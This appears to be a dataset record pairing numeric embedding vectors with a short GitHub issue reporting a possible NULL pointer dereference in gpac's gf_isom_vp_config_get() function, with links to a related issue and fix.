0.0008329133270308375, 0.012118803337216377, 0.011440259404480457, -0.012709137052297592, 0.005363893695175648, -0.029747389256954193, 0.001407979754731059, 0.00365396193228662, 0.0019016207661479712, 0.009737112559378147, 0.01739787869155407, -0.008359667845070362, 0.006805800832808018, -0.016190070658922195, 0.0065208119340240955, -0.0013189207529649138, 0.006497063208371401, -0.024726159870624542, 0.009845679625868797, -0.003212908050045371, 0.009648902341723442, 0.0014147651381790638, 0.010524224489927292, 0.015280821360647678, -0.011311335489153862, 0.026273241266608238, 0.014683702029287815, 0.0006543712806887925, 0.026273241266608238, -0.0024987398646771908, -0.005218006670475006, 0.005882980301976204, 0.006744731683284044, -0.04627672955393791, 0.004637851379811764, 0.0002064259460894391, 0.014480138197541237, -0.00959461834281683, -0.009961032308638096, 0.009818538092076778, 0.025282565504312515, 0.005574242677539587, 0.01830712892115116, -0.012017021887004375, -0.000017255173588637263, -0.0044512515887618065, -0.009994959458708763, -0.0323529988527298, 0.01046994049102068, -0.01116205658763647, 0.03172873705625534, 0.0015937312273308635, -0.006751517299562693, -0.02084488607943058, -0.012200228869915009, -0.012960199266672134, 0.0065683103166520596, 0.0010907602263614535, 0.009363912977278233, 0.011657393537461758, -0.017194315791130066, -0.0026989104226231575, 0.0028838138096034527, -0.011542040854692459, 0.025363991037011147, 0.001966082490980625, -0.009750683791935444, 0.014127295464277267, -0.004671778529882431, -0.00293979374691844, 0.03343867138028145, 0.012519145384430885, 0.0079796826466918, 0.012315581552684307, 0.012308795936405659, 0.0055640642531216145, 0.011195983737707138, 0.01997634768486023, -0.026368238031864166, -0.011087416671216488, -0.015022974461317062, 0.013496248982846737, 0.015891510993242264, 0.025540413334965706, -0.002181520452722907, 0.011460615321993828, -0.009866036474704742, -0.015470813028514385, 0.0029228301718831062, -0.02625967003405094, -0.0012044163886457682, 0.005784591194242239, -0.012960199266672134, -0.019569221884012222, 0.00968282949179411, -0.01735716685652733, -0.016678621992468834, -0.011609895154833794, -0.0029245265759527683, -0.008590372279286385, -0.0007476711762137711, -0.006687055341899395, 0.01453442219644785, 0.0020678641740232706, -0.010395300574600697, -0.001213746378198266, 0.007905042730271816, -0.014290145598351955, 0.022446250542998314, 0.006975437048822641, 0.00871929619461298, -0.021469146013259888, -0.006727768108248711, -0.018103566020727158, 0.002983899088576436, 0.024902580305933952, 0.004390182439237833, -0.00624939426779747, -0.0009635331225581467, -0.006775266490876675, -0.0014673523837700486, -0.012125588953495026, -0.019677788019180298, -0.004349469672888517, 0.006653128191828728, 0.011155270971357822, -0.020397046580910683, -0.0014452997129410505, 0.021075589582324028, 0.01730288378894329, 0.02592039853334427, -0.024726159870624542, 0.007491130847483873, 0.017642155289649963, 0.018632831051945686, -0.014914406463503838, -0.026856789365410805, -0.02198483981192112, -0.007185785565525293, -0.008515732362866402, -0.005041585303843021, -0.006222252734005451, -0.0007692997460253537, -0.011447045020759106, -0.023314787074923515, -0.01852426305413246, -0.007579341530799866, -0.004926232621073723, 0.004848199896514416, 0.00828502792865038, -0.0005983914015814662, 0.01389659009873867, -0.0013511516153812408, 0.001525028608739376, -0.017275741323828697, -0.005092476028949022, -0.023545492440462112, -0.011413117870688438, 0.0075454143807291985, -0.018510691821575165, -0.0037557436153292656, 0.003769314382225275, 0.005336752161383629, -0.012112018652260303, 0.01033423189073801, -0.0027769431471824646, 0.0018659972120076418, -0.009825323708355427, 0.00586601672694087, 0.020112058147788048, 0.0018388554453849792, 0.016285067424178123, 0.019949207082390785, 0.01852426305413246, -0.0021102731116116047, -0.0055131735280156136, -0.02574397623538971, 0.019609933719038963, -0.0046107093803584576, -0.026503946632146835, -0.0015436885878443718, -0.00895678624510765, 0.020437758415937424, 0.02241910807788372, 0.03107733651995659, -0.012010236270725727, -0.00956747680902481, 0.020641321316361427, -0.033764369785785675, 0.0024987398646771908, 0.01875496841967106, 0.0031280899420380592, -0.011542040854692459, 0.01848355121910572, 0.0035284310579299927, -0.004926232621073723, 0.005547100678086281, 0.015877939760684967, 0.008529303595423698, -0.009465695358812809, -0.008603943511843681, -0.0008146774489432573, -0.023789769038558006, 0.003082288196310401, 0.03987127169966698, -0.011012776754796505, 0.017628584057092667, -0.002761675976216793, 0.0026921250391751528, 0.026883931830525398, -0.01304840948432684, 0.013340183533728123, 0.01173203345388174, 0.0014970386400818825, 0.004390182439237833, -0.0009296059142798185, -0.0061035072430968285, -0.019419942051172256, -0.0023257110733538866, -0.0148601233959198, -0.012851632200181484, 0.019609933719038963, -0.002931311959400773, -0.007966111414134502, 0.01411372423171997, 0.020044203847646713, -0.009234989993274212, -0.005309610161930323, -0.0044750007800757885, -0.006575095467269421, 0.003565751016139984, 0.01151489932090044, -0.01346232183277607, 0.008570016361773014, -0.006147612817585468, 0.004712491296231747, 0.018429266288876534, 0.010476726107299328, -0.002651412505656481, -0.0010814302368089557, 0.008481805212795734, 0.019501367583870888, -0.009954246692359447, 0.0014843159588053823, -0.00028710911283269525, -0.004488571546971798, -0.012098447419703007, -0.016665050759911537, -0.006558131892234087, -0.013889804482460022, 0.0020017060451209545, 0.013652314431965351, -0.009472480043768883, -0.0011772746220231056, 0.0022086622193455696, -0.0010899120243266225, -0.015796514227986336, 0.015837227925658226, 0.02556755393743515, 0.01757430098950863, -0.02149628847837448, -0.004804094787687063, -0.02460402250289917, -0.01962350495159626, -0.019202807918190956, 0.0013715079985558987, 0.0028702430427074432, 0.031484462320804596, 0.012403792701661587, 0.0152943916618824, 0.011575968004763126, -0.0015606522792950273, 0.010089956223964691, 0.005197650287300348, 0.00987282209098339, 0.01140633225440979, -0.02036990411579609, -0.007993253879249096, -0.0013511516153812408, -0.00789147149771452, 0.003779492573812604, -0.0027294449973851442, 0.02277195081114769, -0.01993563584983349, 0.017900003120303154, 0.00663277180865407, 0.008468234911561012, 0.01066671870648861, -0.009187491610646248, 0.0172621700912714, -0.021686280146241188, -0.011413117870688438, -0.015362245962023735, -0.014765127561986446, 0.007335065398365259, -0.0028515830636024475, 0.008563230745494366, 0.02631395310163498, 0.03905702009797096, -0.004807487595826387, -0.01818499155342579, -0.018429266288876534, 0.020858455449342728, -0.024834726005792618, 0.01621721312403679, -0.010754929855465889, 0.012519145384430885, -0.007579341530799866, -0.01160311046987772, -0.010938136838376522, 0.012424148619174957, 0.008549660444259644, -0.003414775012061, -0.015796514227986336, -0.012274868786334991, -0.012057734653353691, -0.00847502052783966, 0.0043460773304104805, 0.006191717926412821, -0.0018422481371089816, -0.0034419167786836624, 0.02377619780600071, 0.012125588953495026, 0.012933056801557541, 0.01518582459539175, -0.013299470767378807, -0.03300440311431885, 0.0027888177428394556, 0.012485218234360218, -0.005787984002381563, -0.0358271449804306, -0.004807487595826387, -0.007986468262970448, -0.0026989104226231575, -0.004780345596373081, -0.006452957633882761, -0.001117901992984116, -0.03501289337873459, 0.0077286213636398315, 0.014778697863221169, -0.010300304740667343, -0.010381730273365974, 0.005784591194242239, 0.00027629482792690396, -0.01804928295314312, 0.011039918288588524, 0.008793936111032963, 0.005326573736965656, -0.006737946532666683, 0.0032943333499133587, 0.012444505468010902, -0.0026666796766221523, -0.03531145304441452, 0.003307904116809368, 0.007877901196479797, 0.01315697655081749, -0.00496015977114439, -0.02001706138253212, 0.011637037619948387, 0.005638704169541597, 0.00030386069556698203, -0.007782904896885157, -0.02212054841220379, -0.016800761222839355, -0.0028091738931834698, 0.011243481189012527, 0.014792269095778465, -0.010782071389257908, 0.01378802303224802, -0.003921987023204565, -0.02311122417449951, -0.014045869931578636, 0.009608189575374126, -0.005886373110115528, -0.011494542472064495, -0.007579341530799866, -0.014588705264031887, 0.001244280836544931, -0.02525542490184307, 0.001277359900996089, -0.004508927930146456, 0.009391055442392826, -0.021537000313401222, -0.015592951327562332, 0.012322367168962955, -0.001106027397327125, -0.0013918642653152347, -0.01822570338845253, 0.008162889629602432, -0.0016064540250226855, 0.01475155632942915, -0.012356294319033623, 0.003938950598239899, 0.02792888879776001, 0.007816831581294537, 0.029665963724255562, 0.01226129848510027, -0.002181520452722907, 0.0018201954662799835, -0.006246001459658146, -0.018497122451663017, -0.0037116380408406258, -0.017370738089084625, -0.007837188430130482, -0.009818538092076778, -0.016977181658148766, 0.00543174846097827, -0.015592951327562332, 0.001321465359069407, -0.002919437363743782, -0.014290145598351955, -0.0018337663495913148, 0.01116205658763647, 0.012736279517412186, 0.018293557688593864, -0.007267211098223925, -0.031701598316431046, 0.019555650651454926, -0.015701519325375557, 0.00587958749383688, -0.013475893065333366, -0.008203602395951748, -0.015633663162589073, -0.0009737112559378147, -0.004305364564061165, -0.023626917973160744, -0.00009388298349222168, -0.016637910157442093, -0.004380004480481148, -0.012410578317940235, -0.006307070609182119, -0.005323181394487619, 0.007443632464855909, -0.010904209688305855, 0.019202807918190956, 0.0011026347056031227, -0.0009898267453536391, 0.0008719296311028302, 0.006069580093026161, -0.0179271437227726, 0.0005695532308891416, -0.011148485355079174, -0.022310541942715645, -0.007396134547889233, 0.009506408125162125, -0.005608169827610254, -0.009906749241054058, -0.015240108594298363, 0.00472945487126708, -0.005689595360308886, 0.01582365669310093, 0.016542913392186165, 0.01184060052037239, -0.029828812927007675, -0.010035672225058079, -0.017777863889932632, 0.004101801197975874, -0.020030632615089417, -0.002427492756396532, -0.005469068419188261, -0.011107772588729858, 0.014330858364701271, -0.013028053566813469, -0.025024719536304474, 0.005625133402645588, 0.00042430232861079276, -0.00968282949179411, 0.0078032612800598145, 0.026123961433768272, -0.0063104634173214436, 0.01564723439514637, 0.007525057997554541, 0.0017845719121396542, -0.01970493048429489, -0.01848355121910572, -0.008176460862159729, -0.0013375807320699096, 0.0078032612800598145, -0.003694674465805292, -0.000014684125744679477, 0.007762548513710499, -0.018822822719812393, 0.018904248252511024, 0.030263083055615425, 0.010802427306771278, 0.0012739672092720866, 0.00004452947905519977, -0.010843140073120594, 0.0036709255073219538, 0.0018388554453849792, -0.01411372423171997, -0.011046703904867172, -0.009696399793028831, -0.012437719851732254, -0.012593785300850868, -0.017777863889932632, -0.005061941687017679, 0.009994959458708763, 0.014358000829815865, 0.011060274206101894, -0.02119772881269455, 0.0023545492440462112, 0.007389348931610584, 0.0034639693330973387, -0.009051783010363579, -0.03493146970868111, -0.022310541942715645, 0.004006804898381233, 0.02460402250289917, 0.0028702430427074432, -0.010463155806064606, 0.0008405469125136733, 0.015891510993242264, 0.004525891505181789, -0.011087416671216488, -0.00839359499514103, -0.013421609066426754, -0.004268044605851173, 0.00409840838983655, 0.0022273221984505653, -0.011155270971357822, 0.0077286213636398315, 0.006625986658036709, 0.00023961100669112056, -0.016352921724319458, 0.002951668342575431, 0.0017167174955829978, -0.0072400690987706184, -0.008217173628509045, -0.02452259697020054, -0.012430934235453606, -0.006782051641494036, -0.011033132672309875, -0.02066846378147602, 0.008447878062725067, -0.00001498894107498927, -0.028661716729402542, -0.0037489579990506172, 0.024454742670059204, 0.02915026992559433, -0.012600569985806942, -0.005835482385009527, -0.017560729756951332, -0.00989996362477541, 0.002167949452996254, 0.01219344325363636, 0.018388554453849792, -0.0011933899950236082, 0.0029126519802957773, 0.016420776024460793, -0.015416529960930347, -0.009031426161527634, -0.0077286213636398315, 0.0022595529444515705, -0.01625792495906353, -0.012960199266672134, 0.0062561798840761185, 0.02368120104074478, 0.01673290692269802, 0.009234989993274212, 0.01293984241783619, 0.005723522510379553, -0.00915356446057558, 0.0029109555762261152, -0.01184060052037239, 0.01752001792192459, 0.00850216206163168, 0.012614141218364239, -0.011881313286721706, 0.0029584537260234356, -0.021957697346806526, -0.008678583428263664, -0.012159516103565693, -0.030181657522916794, -0.02155057154595852, -0.007769334129989147, 0.007776119280606508, -0.0036573545075953007, 0.009771039709448814, 0.015063686296343803, 0.04033268243074417, 0.02233768254518509, 0.00789147149771452, -0.010341017507016659, 0.007090789265930653, -0.005326573736965656, 0.0027090886142104864, -0.01367945596575737, 0.0011849082075059414, -0.009825323708355427, -0.012593785300850868, 0.016882184892892838, -0.005720129702240229, 0.0014334251172840595, 0.005672631785273552, -0.013401253148913383, -0.0074232760816812515, -0.0062629650346934795, -0.0001685758907115087, -0.001750644645653665, -0.007273996248841286, 0.014235862530767918, 0.0007905042730271816, -0.004553033038973808, 0.011833814904093742, 0.009418196976184845, -0.011263838037848473, 0.003469058545306325, 0.011447045020759106, -0.018958531320095062, -0.03707566857337952, -0.01343518029898405, -0.019962778314948082, -0.0007799020386300981, 0.017316455021500587, -0.03023594059050083, 0.0172621700912714, 0.008156104013323784, -0.019691359251737595, -0.006429208442568779, -0.009357128292322159, 0.007633625064045191, 0.009316415525972843, -0.008549660444259644, -0.00009033123205881566, 0.022609101608395576, 0.026816075667738914, 0.012776992283761501, -0.006432601250708103, -0.01359124481678009, 0.012430934235453606, -0.012553072534501553, 0.005441926419734955, -0.014927977696061134, -0.0029703283216804266, 0.018822822719812393, 0.011555612087249756, -0.012980555184185505, -0.008101820945739746, -0.004190011881291866, 0.022391967475414276, 0.0009050086373463273, 0.0059745837934315205, -0.013781237415969372, -0.006534383166581392, 0.031131619587540627, 0.016203641891479492, -0.0308059174567461, -0.015755802392959595, -0.008244315162301064, 0.017370738089084625, -0.008990714326500893, 0.00002266232513647992, -0.015362245962023735, -0.01450728066265583, 0.011128128506243229, 0.011698106303811073, 0.006066187284886837, 0.011704891920089722, 0.006123863626271486, -0.02452259697020054, 0.01208487618714571, -0.007789690047502518, 0.002111969515681267, 0.012661639600992203, 0.0024953472893685102, 0.006860084366053343, -0.006486884783953428, -0.007273996248841286, -0.021564142778515816, 0.010171380825340748, 0.027155349031090736, -0.01055815163999796, -0.0013570889132097363, 0.020139198750257492, -0.012403792701661587, 0.004793916363269091, 0.03704852610826492, 0.010714217089116573, 0.010184952057898045, 0.016800761222839355, -0.006846513599157333, 0.015810085460543633, -0.00564888259395957, 0.006313856225460768, 0.008339310996234417, 0.007145072799175978, -0.016162928193807602, 0.0016437738668173552, -0.021930556744337082, -0.0060051181353628635, -0.0017591264331713319, -0.01608150266110897, 0.013686241582036018, 0.0019050135742872953, -0.00629349984228611, -0.0068532987497746944, 0.018673542886972427, 0.0014427551068365574, 0.014982261694967747, 0.005676024127751589, -0.015810085460543633, 0.00795254111289978, -0.0026531086768954992, 0.015416529960930347, -0.004000019282102585, 0.01055815163999796, 0.003038182854652405, 0.013808379881083965, -0.012933056801557541, 0.00766076659783721, -0.007267211098223925, -0.021401291713118553, 0.022921230643987656, 0.0027430159971117973, -0.0268703605979681, -0.0009185795206576586, 0.005720129702240229, 0.0012510663364082575, -0.0034877185244113207, 0.004566604271531105, 0.008386809378862381, 0.0076471958309412, -0.008006824180483818, 0.011175626888871193, -0.01400515716522932, 0.022527676075696945, 0.016936469823122025, -0.0010924565140157938, -0.03200015425682068, -0.020383475348353386, -0.011155270971357822, 0.03561001271009445, -0.0001658192923059687, -0.0054588899947702885, 0.0058219111524522305, -0.040088407695293427, 0.002101791324093938, -0.005560671910643578, 0.002707392442971468, -0.009832109324634075, -0.01690932735800743, -0.013007696717977524, 0.0037421726156026125, 0.021428434178233147, -0.00979139655828476, -0.01743859238922596, -0.005886373110115528, 0.028444582596421242, -0.017710009589791298, -0.005187472328543663, 0.00006318945088423789, 0.036641400307416916, -0.004875341895967722, -0.0003778644313570112, -0.03851418197154999, 0.011725247837603092, -0.0025089180562645197, -0.00839359499514103, 0.031267326325178146, 0.0038710960652679205, 0.0036777108907699585, -0.000988130341283977, -0.011311335489153862, 0.005781198851764202, 0.0009270613663829863, -0.001762519241310656, 0.004105194006115198, -0.008318955078721046, 0.020003490149974823, 0.017140032723546028, 0.007633625064045191, 0.018415696918964386, 0.0367228239774704, -0.0170450359582901, 0.016108645126223564, -0.0026531086768954992, 0.007613268680870533, 0.009078924544155598, -0.005133188795298338, -0.009438552893698215, 0.021794848144054413, -0.00478713121265173, -0.011813458986580372, -0.017628584057092667, 0.012933056801557541, -0.00022349557548295707, 0.012580214068293571, -0.0017693046247586608, 0.02944882959127426, 0.000913490483071655, 0.006039045751094818, 0.0003505106142256409, -0.02425117790699005, -0.004376611672341824, -0.022391967475414276, -0.022229116410017014, 0.00700257858261466, -0.04003412276506424, -0.006530990358442068, 0.007640410680323839, -0.006449564825743437, -0.00808824971318245, -0.0009287577122449875, -0.014154436998069286, 0.0029177411925047636, 0.02324693277478218, 0.025513270869851112, 0.007280781865119934, 0.0020576859824359417, 0.001063618459738791, -0.00197286787442863, 0.01700432412326336, 0.004044124856591225, 0.00587958749383688, -0.019637076184153557, 0.004285008180886507, -0.006782051641494036, 0.013441965915262699, -0.008950001560151577, 0.0035453946329653263, -0.007382563780993223, 0.005591206252574921, -0.0174793042242527, 0.0026649832725524902, -0.017058607190847397, 0.01765572652220726, -0.009852465242147446, -0.011860957369208336, -0.013652314431965351, -0.005038192495703697, 0.01192881166934967, -0.012729493901133537, -0.005492817144840956, -0.0009228204726241529, 0.02448188327252865, -0.0014486924046650529, 0.01834784261882305, 0.022690527141094208, 0.017696438357234, -0.0025699869729578495, -0.006659913808107376, -0.019786356016993523, -0.015036544762551785, -0.031050194054841995, 0.0035793220158666372, 0.002363031031563878, 0.005723522510379553, -0.007450418081134558, 0.010395300574600697, 0.008651441894471645, 0.0044275023974478245, 0.011562397703528404, -0.01348267775028944, 0.015267250128090382, -0.008230743929743767, 0.024766871705651283, -0.018822822719812393, 0.014222291298210621, -0.009228204376995564, -0.011799887754023075, 0.03460576757788658, -0.0033893294166773558, -0.011019561439752579, 0.008054322563111782, 0.00009467815107200295, -0.005906729493290186, -0.004190011881291866, 0.006792230065912008, -0.010829569771885872, -0.003253620583564043, 0.0005173901445232332, 0.01669219322502613, 0.0057167368941009045, 0.004268044605851173, 0.0010008530225604773, -0.008033966645598412, -0.008101820945739746, -0.022568387910723686, -0.009357128292322159, -0.006666698958724737, -0.004369826056063175, -0.009363912977278233, -0.011365619488060474, -0.005414784885942936, -0.01787286065518856, 0.022609101608395576, 0.0025920397602021694, 0.014439425431191921, 0.0015623485669493675, -0.014466567896306515, 0.0030330936424434185, 0.017099320888519287, 0.020437758415937424, -0.004848199896514416, 0.016325779259204865, 0.007606483064591885, 0.009106066077947617, -0.006710804533213377, -0.005760842468589544, -0.005391035694628954, 0.03357437998056412, -0.011033132672309875, 0.006843120791018009, 0.000687026244122535, 0.004230724647641182, -0.0024732945021241903, 0.041934046894311905, -0.0009389359038323164, -0.0064902775920927525, -0.0011654001427814364, -0.011806673370301723, -0.005333359353244305, -0.007918613962829113, -0.022758381441235542, -0.010815998539328575, -0.007124716881662607, 0.008156104013323784, 0.014303716830909252, 0.017710009589791298, 0.03132161125540733, 0.023396212607622147, 0.017886431887745857, -0.012329152785241604, 0.040658384561538696, -0.0009431767975911498, -0.020125627517700195, -0.009601403959095478, 0.0019304589368402958, 0.015131541527807713, 0.0006946598878130317, 0.0015801603440195322, 0.008142533712089062, -0.00025763484882190824, 0.005706558935344219, 0.0032604059670120478, 0.00019995856564491987, 0.005194257944822311, 0.010436013340950012, -0.00968282949179411, -0.006575095467269421, 0.013774451799690723, 0.0032146042212843895, -0.009743898175656796, -0.015416529960930347, -0.00408483762294054, 0.01993563584983349, 0.012899129651486874, -0.00766076659783721, -0.006653128191828728, -0.01182024460285902, 0.004875341895967722, 0.030344506725668907, -0.022541247308254242, 0.02355906367301941, -0.0027548903599381447, 0.0072875674813985825, 0.0036234273575246334, 0.0033689732663333416, -0.00019847425573971123, -0.0010000048205256462, -0.0005576786934398115, -0.008298598229885101, -0.009092495776712894, 0.006754910107702017, 0.011888098903000355, 0.006636164616793394, -0.0025937361642718315, -0.021971268579363823, -0.02155057154595852, 0.00891607441008091, -0.006873655132949352, 0.018863536417484283, -0.010347803123295307, -0.0054351408034563065, -0.005547100678086281, 0.003457183949649334, -0.010931351222097874, 0.01097206398844719, 0.011073845438659191, 0.015606522560119629, 0.007457203231751919, -0.0024614199064671993, -0.014887264929711819, -0.008970357477664948, 0.021577714011073112, 0.006039045751094818, -0.03645140677690506, 0.018035711720585823, 0.004726062063127756, -0.00603226013481617, 0.004539462272077799, 0.008902503177523613, -0.009709971025586128, -0.013509820215404034, -0.010836354456841946, -0.0015810085460543633, 0.0020814351737499237, 0.0011628555366769433, -0.030045948922634125, 0.00440375367179513, 0.009832109324634075, 0.011670964770019054, -0.007918613962829113, 0.018497122451663017, 0.0063104634173214436, -0.005218006670475006, 0.01348267775028944, -0.020247766748070717, -0.0019168880535289645, 0.0019287625327706337, 0.02316550724208355, -0.01804928295314312, -0.020559895783662796, 0.019854210317134857, -0.00580155523493886, 0.02543184533715248, -0.0019711717031896114, 0.009119637310504913, -0.005889765918254852, -0.007898257113993168, 0.018279986456036568, 0.0018405518494546413, 0.02041061781346798, 0.0006776962545700371, -0.011223125271499157, 0.013421609066426754, 0.016800761222839355, -0.02560826763510704, 0.018374983221292496, -0.0018761754035949707, -0.0002648443914949894, -0.019677788019180298, 0.008732867427170277, -0.003136571729555726, -0.017492875456809998, 0.00852251797914505, 0.00789147149771452, 0.0078643299639225, -0.041499778628349304, -0.018727825954556465, 0.013842307031154633, -0.00575744966045022, -0.022609101608395576, 0.012240941636264324, 0.018239274621009827, -0.004502142313867807, 0.014222291298210621, -0.000027035755920223892, 0.008346096612513065, 0.000698052579537034, 0.0021950912196189165, 0.010707431472837925, 0.014629418030381203, 0.021292725577950478, 0.017682868987321854, -0.0005127251497469842, -0.0036709255073219538, 0.0012646372197195888, -0.0026785542722791433, 0.011996665969491005, -0.009363912977278233, -0.013333397917449474, -0.0014274879358708858, -0.028987418860197067, -0.009214633144438267, -0.0031043407507240772, -0.002449545543640852, 0.0074979159981012344, 0.02184913121163845, -0.012424148619174957, -0.004301971755921841, 0.008556445129215717, 0.02391190640628338, 0.004027161281555891, -0.0021204513031989336, 0.0037760997656732798, 0.0007120475638657808, 0.0013672671047970653, 0.009635331109166145, -0.004586960654705763, 0.051026541739702225, -0.007518272381275892, -0.0051772939041256905, 0.023545492440462112, -0.015837227925658226, 0.0047090984880924225, 0.0011976308887824416, -0.008868576027452946, 0.0017896610079333186, -0.015877939760684967, 0.010544580407440662, 0.012817704118788242, 0.008536089211702347, -0.0054588899947702885, -0.01582365669310093, -0.004746418446302414, -0.008637870661914349, -0.0037116380408406258, -0.019257090985774994, -0.024142611771821976, 0.005509780719876289, 0.015538668259978294, 0.030968768522143364, 0.011440259404480457, 0.00008248555968748406, 0.0015860976418480277, -0.0031518389005213976, -0.009621759876608849, -0.009391055442392826, -0.02133343741297722, 0.015674376860260963, -0.00018744790577329695, 0.01343518029898405, -0.008040751330554485, 0.025933967903256416, 0.011521684937179089, 0.0018083209870383143, 0.015701519325375557, 0.0036980672739446163, 0.003202729858458042, 0.010388515889644623, -0.013055195100605488, -0.01852426305413246, -0.01958279311656952, -0.009723542258143425, 0.011372405104339123, -0.0013884715735912323, 0.018117137253284454, 0.004797309171408415, 0.006880440749228001, 0.0010754929389804602, 0.012688781134784222, -0.009343557059764862, 0.016149356961250305, -0.00652420474216342, 0.007620054297149181, 0.012519145384430885, 0.0013189207529649138, -0.023613346740603447, 0.01182024460285902, -0.000730283441953361, 0.02009848691523075, -0.0018100172746926546, -0.027630329132080078, -0.013726954348385334, 0.019474225118756294, -0.003255316987633705, 0.01669219322502613, 0.010612434707581997, 0.024061186239123344, -0.007525057997554541, -0.005455497186630964, -0.013740524649620056, -0.012933056801557541, 0.00300934468396008, -0.012681995518505573, 0.017750723287463188, -0.010293519124388695, 0.00935034267604351, -0.004413931630551815, -0.012166301719844341, -0.0032383534125983715, -0.005991547368466854, -0.011270623654127121, 0.006371532566845417, -0.014045869931578636, 0.000026187573894276284, -0.004736240021884441, -0.0026378415059298277, 0.015715088695287704, 0.00010724183084676042, 0.0155115257948637, -0.014656560495495796, -0.017723580822348595, 0.022256257012486458, 0.0062324306927621365, 0.002008491661399603, 0.016977181658148766, -0.00008757464092923328, -0.0060797580517828465, 0.030968768522143364, -0.008922859095036983, -0.016312208026647568, 0.0007642107084393501, -0.006313856225460768, -0.024454742670059204, -0.012159516103565693, -0.013061980716884136, -0.01651577092707157, 0.0072943526320159435, 0.008033966645598412, -0.017547158524394035, -0.014425855129957199, -0.023789769038558006, -0.013455536216497421, 0.02054632641375065, -0.009927105158567429, -0.015362245962023735, -0.0010907602263614535, -0.005530137103050947, -0.019419942051172256, 0.0005390187725424767, 0.0012519145384430885, -0.018320700153708458, -0.0024037437979131937, -0.028336016461253166, -0.017465734854340553, -0.008108606562018394, -0.01543010026216507, 0.002435974543914199, -0.0019270662451162934, -0.005889765918254852, 0.008047536946833134, 0.024061186239123344, 0.012315581552684307, 0.004936411045491695, -0.0030025590676814318, 0.02031562104821205, -0.006765088066458702, 0.008868576027452946, -0.011128128506243229, 0.05971191078424454, -0.010069599375128746, -0.008271456696093082, -0.008678583428263664, -0.01300091203302145, -0.0012095054844394326, 0.0011721855262294412, -0.00523497024551034, -0.010035672225058079, 0.007396134547889233, 0.011480972170829773, 0.01966421864926815, -0.0022035730071365833, 0.0006111140828579664, 0.01722145825624466, 0.02263624221086502, 0.023545492440462112, 0.012356294319033623, 0.016203641891479492, -0.00789147149771452, 0.028471725061535835, -0.007701479364186525, -0.025011148303747177, 0.008420736528933048, -0.02682964690029621, 0.006934724282473326, -0.005428355652838945, -0.0006475858390331268, 0.002171342261135578, -0.0052485414780676365, -0.017628584057092667, -0.016990752890706062, 0.010626005940139294, 0.009201062843203545, -0.003458880353718996, 0.0007667551981285214, -0.006866869982331991, -0.0035148602910339832, 0.006395281292498112, -0.013828735798597336, 0.02031562104821205, -0.04467536509037018, 0.006656520999968052, -0.009065354242920876, -0.016814330592751503, -0.006059401668608189, -0.001213746378198266, 0.01897210255265236, 0.004335898905992508, 0.006503848358988762, -0.0043223281390964985, -0.007443632464855909, 0.0032061224337667227, 0.001309590763412416, 0.028905993327498436, -0.00766076659783721, -0.010707431472837925, 0.018551405519247055, -0.013279114849865437, 0.0007955933688208461, -0.014493709430098534, -0.0006518267327919602, 0.012899129651486874 ]
2,262
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
https://github.com/gpac/gpac/blob/67271ce02570512e78bb6ab6bdc20bcb2a994d04/src/isomedia/avc_ext.c#L2423-L2424 Hello, I think a NULL pointer dereference may occur in gf_isom_vp_config_get() in src/isomedia/avc_ext.c (there is a related issue described in https://github.com/gpac/gpac/issues/1791). There in a similar fix in https://github.com/gpac/gpac/commit/b2eab95e07cb5819375a50358d4806a8813b6e50 .
A NULL pointer dereference may occur in gf_isom_vp_config_get() in src/isomedia/avc_ext.c
https://api.github.com/repos/gpac/gpac/issues/1792/comments
0
2021-05-17T07:54:02
2021-05-17T14:49:45Z
https://github.com/gpac/gpac/issues/1792
893,048,343
1,792
false
This is a GitHub Issue repo:gpac owner:gpac Title : A NULL pointer dereference may occur in gf_isom_vp_config_get() in src/isomedia/avc_ext.c Issue date: --- start body --- https://github.com/gpac/gpac/blob/67271ce02570512e78bb6ab6bdc20bcb2a994d04/src/isomedia/avc_ext.c#L2423-L2424 Hello, I think a NULL pointer dereference may occur in gf_isom_vp_config_get() in src/isomedia/avc_ext.c (there is a related issue described in https://github.com/gpac/gpac/issues/1791). There in a similar fix in https://github.com/gpac/gpac/commit/b2eab95e07cb5819375a50358d4806a8813b6e50 . --- end body ---
598
[ -0.009203691966831684, 0.04554611071944237, -0.01031300239264965, 0.025005988776683807, 0.002961141290143132, 0.0171191543340683, -0.03329360485076904, 0.04099436104297638, -0.01992463320493698, 0.010885548777878284, -0.03581281378865242, 0.0023921728134155273, 0.031003417447209358, 0.01459994725883007, 0.006194242276251316, 0.03990652412176132, -0.027611076831817627, 0.017018958926200867, -0.010520550422370434, -0.0050956676714122295, 0.05255981162190437, -0.01656092144548893, -0.007435953710228205, 0.03229164704680443, -0.003811015747487545, 0.00412591639906168, -0.021627960726618767, -0.007002965081483126, 0.010205649770796299, 0.0027535930275917053, 0.028097741305828094, 0.006333800498396158, 0.015558963641524315, 0.022329330444335938, 0.06080448627471924, 0.004877384286373854, 0.007274924777448177, 0.053848039358854294, -0.005142187234014273, 0.03295007720589638, 0.013075540773570538, -0.030259106308221817, -0.016160137951374054, -0.00027978760772384703, -0.0034639090299606323, 0.008108695968985558, 0.026852451264858246, 0.03237752988934517, -0.03927672281861305, -0.013612303882837296, 0.039362601935863495, -0.028355387970805168, -0.003138273023068905, -0.032635174691677094, -0.01153682079166174, -0.047950807958841324, 0.01590249128639698, 0.009647415950894356, -0.0075146788731217384, 0.044086117297410965, -0.026809511706233025, 0.021713843569159508, -0.018994245678186417, 0.008853007107973099, -0.0039398386143147945, 0.03761633485555649, -0.017348172143101692, 0.006927818059921265, -0.024347558617591858, 0.020053457468748093, 0.014557006768882275, -0.04394298046827316, -0.015057984739542007, 0.021985802799463272, 0.031003417447209358, -0.042712002992630005, 0.03128968924283981, 0.044114742428064346, -0.003864692058414221, -0.0022007273510098457, -0.028641661629080772, 0.02579323947429657, -0.030574006959795952, -0.011565448716282845, -0.000404137623263523, 0.0014349458506330848, -0.04179592803120613, -0.07557620108127594, -0.008223205804824829, -0.0014268943341448903, -0.0073930127546191216, 0.01658954843878746, -0.004029299132525921, -0.009704670868813992, 0.019552478566765785, 0.0014537324896082282, -0.00647693732753396, -0.014972102828323841, -0.013433382846415043, -0.01730523258447647, -0.02922852151095867, -0.03357987850904465, 0.038675546646118164, 0.02846989780664444, 0.02056874893605709, -0.0023492316249758005, 0.024318931624293327, -0.01355504896491766, 0.014435339719057083, 0.12401366978883743, -0.007070954889059067, -0.042024947702884674, -0.011637017130851746, -0.0073930127546191216, 0.004269053228199482, 0.036786142736673355, -0.02980106882750988, -0.03727280721068382, 0.005342578981071711, -0.02383226715028286, -0.01930914632976055, -0.029343031346797943, 